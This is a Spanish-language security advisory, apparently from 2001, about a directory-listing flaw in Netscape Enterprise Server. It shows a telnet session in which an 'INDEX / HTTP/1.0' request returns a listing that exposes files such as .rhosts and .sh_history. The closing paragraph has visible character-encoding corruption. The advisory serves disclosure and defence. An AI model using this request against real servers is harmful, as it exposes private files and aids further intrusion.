El servidor web de Netscape incluye la característica Web Publishing (Publicación Web) que se instala y habilita por defecto al realizar la instalación de la aplicación. Si esta opción se encuentra activada un usuario remoto podrá lograr visualizar los contenidos de cualquier directorio del web.
Si el atacante se conecta por telnet al puerto por el que opera Netscape Enterprise Server y realiza la petición «INDEX / HTTP/1.0» provocará que el servidor muestre un listado completo del contenido del directorio
especificado. De la siguiente forma:
Trying 192.168.1.1…
Connected to www.example.org.
Escape character is `^]¦.
INDEX / HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain
test directory 512 979859452 0 null null
images directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
admin directory 512 979701801 0 null null
..rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
..sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
..cshrc unknown 418 975657629 264 null null
..login unknown 674 975657629 264 null null
Si esta vulnerabilidad se logra explotar con ‘xito podr facilitar al atacante la obtenci¢n de informaci¢n sensible y posibilitar el realizar un ataque mucho m s elaborado.
Opina sobre esta noticia:
http://www.hispasec.com/unaaldiacom.asp?id=823
M s informaci¢n:
Securityfocus
http://www.securityfocus.com/vdb/bottom.html?vid=2285
Bugtraq
http://www.securityfocus.com/archive/1/158099
Antonio Ropero
antonior@hispasec.com
